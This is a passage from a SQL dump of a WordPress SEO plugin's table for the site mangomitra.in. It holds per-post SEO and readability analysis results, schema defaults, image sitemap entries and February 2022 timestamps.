readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,64,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2022-02-04 07:37:26','default','default',NULL,NULL,NULL,NULL,0,'2022-02-04 07:26:22','2022-02-04 07:37:26'),(51,726,'#post_title #separator_sa #site_title','#post_content','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 0 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,64,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2022-02-04 07:37:29','default','default',NULL,NULL,NULL,NULL,0,'2022-02-04 07:26:59','2022-02-04 07:37:29'),(52,728,'#post_title #separator_sa #site_title','#post_content','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2022-02-04 07:37:32','default','default',NULL,NULL,NULL,NULL,0,'2022-02-04 07:27:27','2022-02-04 07:37:32'),(53,730,'#post_title #separator_sa #site_title','#post_content','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 0 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,64,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2022-02-08 07:35:27','default','default',NULL,NULL,NULL,NULL,0,'2022-02-04 07:54:49','2022-02-08 07:35:27'),(54,732,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":[],\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":3},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 0 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,60,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2022-02-04 10:33:50','default','default',NULL,NULL,NULL,NULL,0,'2022-02-04 10:31:05','2022-02-04 10:33:50'),(55,734,'#post_title #separator_sa #site_title','#post_content','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description Length\",\"description\":\"Well done!\",\"score\":9,\"maxScore\":9,\"error\":0},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":3},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 71.7 in the test, which is considered fairly easy to read.\",\"score\":9,\"maxScore\":9,\"error\":0},\"errors\":1}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,72,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2022-02-09 07:56:31','default','default',NULL,NULL,NULL,NULL,0,'2022-02-04 10:35:07','2022-02-09 08:05:04'),(56,745,NULL,NULL,'[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is over 160 characters.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"The content length is ok. Good job!\",\"score\":9,\"maxScore\":9,\"error\":0},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":3},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":0,\"title\":\"Images\\/videos in content\",\"description\":\"Your content contains images and\\/or video(s).\",\"score\":5,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"At least one paragraph is long. Consider using short paragraphs.\",\"score\":0,\"maxScore\":5,\"error\":1},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":{\"title\":\"Transition words\",\"description\":\"Only 22.8% of the sentences contain transition words, which is not enough. Use more of them.\",\"score\":6,\"maxScore\":9,\"error\":1},\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"Great job!\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 68.8 in the test, which is considered ok to read.\",\"score\":9,\"maxScore\":9,\"error\":0},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,71,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"advanced\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}','[{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/02\\/Artboard-6-8.png\",\"image:title\":\"Artboard-6-8\",\"image:caption\":\"\"},{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/02\\/Artboard-3-8-1.png\",\"image:title\":\"Artboard-3-8-1\",\"image:caption\":\"\"},{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/02\\/Artboard-5-8-1.png\",\"image:title\":\"Artboard-5-8-1\",\"image:caption\":\"\"},{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/02\\/Artboard-2-8-1.png\",\"image:title\":\"Artboard-2-8-1\",\"image:caption\":\"\"},{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/02\\/Artboard-1-8.png\",\"image:title\":\"Artboard-1-8\",\"image:caption\":\"\"},{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/02\\/Artboard-7-8-2.png\",\"image:title\":\"Artboard-7-8-2\",\"image:caption\":\"\"},{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/02\\/Artboard-4-8.png\",\"image:title\":\"Artboard-4-8\",\"image:caption\":\"\"}]','2022-02-09 09:57:23','default','default',NULL,NULL,NULL,NULL,0,'2022-02-04 11:38:45','2022-02-09 09:57:23'),(57,787,NULL,NULL,'[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2022-02-09 07:40:18','default','default',NULL,NULL,NULL,NULL,0,'2022-02-08 07:16:46','2022-02-09 07:40:18'),(58,843,'#post_title #separator_sa #site_title','#post_content','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 35.6 in the test, which is considered difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,64,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2022-02-08 07:35:27','default','default',NULL,NULL,NULL,NULL,0,'2022-02-08 07:30:03','2022-02-08 07:35:27'),(59,845,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-02-08 07:34:59','2022-02-08 07:34:59'),(60,846,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-02-08 07:44:11','2022-02-08 07:44:11'),(62,850,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-02-08 08:38:19','2022-02-08 08:38:19'),(63,851,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-02-08 08:39:40','2022-02-08 08:39:40'),(64,852,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-02-08 08:47:40','2022-02-08 08:47:40'),(66,881,'#post_title #separator_sa 